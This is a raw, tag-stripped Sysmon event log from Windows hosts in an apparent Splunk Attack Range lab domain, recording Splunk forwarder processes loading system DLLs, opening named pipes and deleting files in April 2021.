23542300x80000000000000001531116Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.172{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88E593D5F7104149D4348EFE0C2551E8,SHA256=D3A97C02C12C0E79E5F763F9DC3B38F67F10BD7E7484EC2EE751FFB96AD9AEEAfalsefalse - insufficient disk space 534500x80000000000000001531115Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.125{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001531114Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.125{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x80000000000000001531113Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.125{21761711-6137-6080-C15D-00000000BB01}81721860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531112Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.125{21761711-6137-6080-C15D-00000000BB01}8172C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001531111Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.125{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 10341000x80000000000000001061190Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:32.061{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061189Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:32.061{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001531110Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.040{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001531109Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:32.040{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D6B082D128AB134CFBC22781DBE31D,SHA256=55DC42D583E337A299F95AC73F6AFF33C1553F4A159A4B9FD9DCDB04707A9F8Efalsefalse - insufficient disk space 734700x80000000000000001531108Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft 
WindowsValid 734700x80000000000000001531107Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001531106Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001531105Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001531104Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001531103Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 
17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001531102Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.987{21761711-6137-6080-C15D-00000000BB01}8172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 23542300x80000000000000001061194Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:33.207{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7144B330B0D76E57DA9AAEC3A13433B,SHA256=64D363F193CE857E9FB770C636C40A493A2F62452EDCABCAE71B581B218DC92B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001531238Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.660{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001531237Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.660{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B85353CB8F575E768CDA34F83036305,SHA256=36D2D365F7575954265CB58EE935DA3AA00C558CD72B18026567EED9EE23BCAFfalsefalse - insufficient 
disk space 534500x80000000000000001531236Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.475{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001531235Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.475{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001531234Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.475{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001531233Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.475{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x80000000000000001531232Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.475{21761711-8437-607D-CE00-00000000BB01}2032C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001531231Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.475{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90ADFF1CE9414F339ED26B95533E1035,SHA256=16360B23417E323FF25973642DD35D6B88571F7024FBE3951AC7C62ECF030859falsefalse - insufficient disk space 734700x80000000000000001531230Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001531229Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001531228Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001531227Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001531226Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001531225Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe 734700x80000000000000001531224Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 
734700x80000000000000001531223Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001531222Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001531221Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001531220Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001531219Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001531218Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001531217Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001531216Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program 
Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001531215Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001531214Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.4169 (rs1_release.210107-1130)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=D21FAA584F844E61375D95B5BE9115EE,SHA256=E221EA0081FDE7AAAD71A38016A8D470082B3732E9ED2D8ED7C97E9F41AF0045trueMicrosoft WindowsValid 734700x80000000000000001531213Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001531212Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001531211Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001531210Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001531209Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001531208Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001531207Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001531206Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001531205Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 
734700x80000000000000001531204Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001531203Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:33.344{21761711-6139-6080-C35D-00000000BB01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 